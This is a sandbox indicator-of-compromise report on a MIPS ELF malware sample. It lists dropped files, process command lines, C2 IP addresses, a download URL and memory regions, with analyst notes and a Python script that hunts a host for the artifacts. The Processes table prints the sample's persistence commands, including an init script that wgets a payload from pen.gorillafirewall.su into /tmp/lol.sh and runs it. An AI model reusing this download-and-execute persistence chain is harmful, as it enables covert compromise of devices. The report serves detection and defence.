IOC Report
mipsel.nn.elf


Files

File Path | Type | Category | Malicious
mipsel.nn.elf | ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/mipsel.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -
/tmp/qemu-open.7muIa1 (deleted) | ASCII text | dropped | -
/tmp/qemu-open.8o8Kh2 (deleted) | ASCII text, with no line terminators | dropped | -
(2 further files are not included in this export.)

Note: the sample is a statically linked 32-bit MIPS ELF, so the sandbox runs it under QEMU user-mode emulation. The /tmp/qemu-open.* temporary files belong to that emulator and /memfd:snapd-env-generator to the host's systemd/snapd; neither is written by the sample and neither is usable as an indicator. Among the remaining "dropped" entries, /etc/profile, /etc/rc.local, /etc/inittab and /etc/motd exist on any ordinary Linux host, so their presence proves nothing; what matters is whether their content references the sample, its init script or its download URL.

Processes

Path | Cmdline | Malicious
/tmp/mipsel.nn.elf | /tmp/mipsel.nn.elf | -
/tmp/mipsel.nn.elf | - | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/systemctl | systemctl enable custom.service | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/mybinary | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf" | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/mipsel.nn.elf | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/mkdir | mkdir -p /etc/rc.d | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf | -
/tmp/mipsel.nn.elf | - | -
/usr/libexec/gnome-session-binary | - | -
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping | -
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping | -
/usr/lib/systemd/systemd | - | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | -
(24 further processes are not included in this export.)

Note: the rows from /usr/libexec/gnome-session-binary onward are the sandbox host's own GNOME session, systemd and snapd environment generator, not activity of the sample. The sample registers itself three separate ways, with systemd (custom.service), with /etc/rcS.d/S99mybinary and with /etc/rc.d/S99mipsel.nn.elf, and every command is wrapped in >/dev/null 2>&1, so a failure of any one method is silent and all three locations have to be checked on a suspect host. The \n sequences in the echo argument are passed to echo literally; they only become real line breaks if the target's /bin/sh has an echo that interprets backslash escapes (dash does, bash's builtin does not without -e), so the exact bytes of /etc/init.d/mipsel.nn.elf depend on the shell of the infected device. The script itself starts the binary from /tmp, then fetches http://pen.gorillafirewall.su/ into /tmp/lol.sh and executes it, so /tmp/lol.sh is a second artifact to look for.
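The persistence chain in the process list (enable custom.service, mark /etc/init.d/mybinary executable and link it as /etc/rcS.d/S99mybinary, write /etc/init.d/mipsel.nn.elf and link it as /etc/rc.d/S99mipsel.nn.elf) maps directly onto a host check. The script below is an added example written for this report, not code from the sandbox or from the sample; every path, link target and string it looks for is copied from the Files, Processes, URLs and IPs tables. The root argument is an assumption of the example so the same check can be run against a live root, a mounted disk image or a constructed test tree.

```python
#!/usr/bin/env python3
"""Hunt a Linux root (a live "/" or a mounted image) for the persistence
artifacts listed in this report.

Added example for the report; not code from the sandbox or from the sample.
Paths, symlink targets and strings are copied from the Files, Processes,
URLs and IPs tables. The `root` argument is an assumption of this example
so it can be pointed at a mounted image or a constructed test tree.
"""
import os
import sys
from pathlib import Path
from typing import List, Optional, Tuple

# Files the sample creates; none of these belongs on a clean host.
DROPPED_PATHS = [
    "etc/init.d/mipsel.nn.elf",
    "etc/init.d/mybinary",
    "etc/systemd/system/custom.service",
    "tmp/mipsel.nn.elf",
    "tmp/lol.sh",
]

# rc symlinks created with `ln -s` in the Processes table: link -> target.
RC_LINKS = {
    "etc/rcS.d/S99mybinary": "/etc/init.d/mybinary",
    "etc/rc.d/S99mipsel.nn.elf": "/etc/init.d/mipsel.nn.elf",
}

# System files the sample rewrote. They exist on every host, so only their
# content counts as evidence.
REWRITTEN_SYSTEM_FILES = [
    "etc/profile",
    "etc/rc.local",
    "etc/inittab",
    "etc/motd",
    "boot/bootcmd",
]

# Strings taken from the echo'd init script and the URL/IP tables.
MARKERS = [
    "pen.gorillafirewall.su",
    "/tmp/lol.sh",
    "/tmp/mipsel.nn.elf",
    "mybinary",
    "custom.service",
    "154.216.17.220",
    "91.92.246.113",
    "93.123.85.166",
    "45.202.35.64",
]

Finding = Tuple[str, str, str]  # (category, path, detail)


def first_marker(path: Path) -> Optional[str]:
    """Return the first MARKER found in `path`, reading bytes so that an
    unreadable or non-UTF-8 file is skipped rather than raising."""
    try:
        data = path.read_bytes()
    except OSError:
        return None
    for marker in MARKERS:
        if marker.encode() in data:
            return marker
    return None


def hunt(root: str = "/") -> List[Finding]:
    """Return every artifact from the report found under `root`."""
    base = Path(root)
    findings: List[Finding] = []

    for rel in DROPPED_PATHS:
        p = base / rel
        if p.exists() or p.is_symlink():   # is_symlink() also catches dangling links
            findings.append(("dropped_file", str(p), "present"))

    for rel, target in RC_LINKS.items():
        p = base / rel
        if p.is_symlink():
            actual = os.readlink(p)
            note = "" if actual == target else f" (report shows {target})"
            findings.append(("rc_symlink", str(p), f"-> {actual}{note}"))
        elif p.exists():
            findings.append(("rc_entry", str(p), "exists but is not a symlink"))

    for rel in REWRITTEN_SYSTEM_FILES:
        p = base / rel
        if p.is_file():
            hit = first_marker(p)
            if hit:
                findings.append(("rewritten_system_file", str(p), f"contains {hit!r}"))

    # Any other init.d script carrying the markers: covers a copy of the
    # init script saved under a different name.
    initd = base / "etc/init.d"
    if initd.is_dir():
        for p in sorted(initd.iterdir()):
            if p.is_file() and str(p.relative_to(base)) not in DROPPED_PATHS:
                hit = first_marker(p)
                if hit:
                    findings.append(("initd_script", str(p), f"contains {hit!r}"))

    return findings


if __name__ == "__main__":
    for category, path, detail in hunt(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"{category:22} {path}  {detail}")
```

Run it as `python3 hunt.py /` on a live host or `python3 hunt.py /mnt/image` on a mounted filesystem. A symlink whose target differs from the report is still reported, with the expected target noted, because the S99 link is the indicator and the target is only corroboration. An empty result does not clear a host: the report's process and file lists are truncated, and the check only knows the names and strings this one sample used.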

URLs

Name | IP | Malicious
http://pen.gorillafirewall.su/ | unknown | -

IPs

IP | Domain | Country | Malicious
154.216.17.220 | unknown | Seychelles | malicious
91.92.246.113 | unknown | Bulgaria | malicious
93.123.85.166 | unknown | Bulgaria | malicious
45.202.35.64 | unknown | Seychelles | -

Memdumps

Base Address | Protect | Malicious
7fc008419000 | page execute read | malicious
7fc08eb7d000 | page read and write | -
7fc088021000 | page read and write | -
7fc00845a000 | page read and write | -
7fc08f599000 | page read and write | -
7fc08f470000 | page read and write | -
55b14bcca000 | page read and write | -
7fc08ef41000 | page read and write | -
7fc08e8cd000 | page read and write | -
55b14bcc0000 | page read and write | -
7ffca252b000 | page read and write | -
7fc08e8bf000 | page read and write | -
7fc08e0b7000 | page read and write | -
7ffca25a2000 | page execute read | -
55b14dcdf000 | page read and write | -
7fc08ef5e000 | page read and write | -
7fc08f5a1000 | page read and write | -
7fc08f28f000 | page read and write | -
7fc088000000 | page read and write | -
55b14ba38000 | page execute read | -
55b14ec5e000 | page read and write | -
7fc08ef1e000 | page read and write | -
55b14dcc8000 | page execute and read and write | -
7fc00845e000 | page read and write | -
7fc08f5e6000 | page read and write | -
(15 further memdumps are not included in this export.)

Note: the report's region type column is empty for every dump, so it is omitted here. Addresses such as 7fc008419000 and 55b14bcca000 lie outside any 32-bit address space; they belong to the 64-bit emulator process that hosts the MIPS sample, not to the sample's own memory layout, so they are not reusable as indicators. The single region flagged malicious is execute-read, and 55b14dcc8000 is the only region mapped writable and executable at once.